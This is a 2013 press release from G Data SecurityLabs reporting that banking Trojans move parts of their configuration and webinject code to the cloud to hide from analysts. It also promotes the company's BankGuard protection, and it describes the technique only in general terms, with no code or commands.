Spying via the cloud for cash

Banking Trojans disguise attack targets in the cloud

09/11/2013 | Bochum (Germany) 

Experts at G Data SecurityLabs have discovered a new eCrime trend: malware from the cloud. This involves perpetrators using cloud technology to try to disguise their attacks. As part of a current eCrime campaign, G Data experts were able to prove the use of this "stealth cloud" technology for the first time. The malware at play here uses spyware known as "information stealers". They target online banking customers, actively intercepting and manipulating payment traffic on the customer side. With this new process, malware authors have moved some of these malicious functions to the cloud. These elements are practically invisible to analysts, making it more difficult to design countermeasures. G Data customers are protected against these attacks thanks to the BankGuard technology that is a part of the G Data solutions for both business and private clients.

Previous operation
Banking Trojans traditionally use configuration files that have been stored on the computer under attack. These configuration files contain the addresses of the compromised websites, and the code, called the Webinject, which they are seeking to add to these websites via the banking Trojans. This code is then responsible for stealing access data and personal information, for example.

Stealth Cloud technology
With this new functionality individual parts of the malware configuration are moved to the cloud. Through this procedure, the malware authors intend to prevent an analysis by antivirus vendors and banks.

Graph 1: Classical Man in the Browser attack



Graph 2: Information Stealer with Cloud technology



For detailed technical information, visit the G Data SecurityBlog: http://blog.gdatasoftware.com/blog/article/banking-trojans-disguise-attack-targets-in-the-cloud.html


Daniëlle van Leeuwen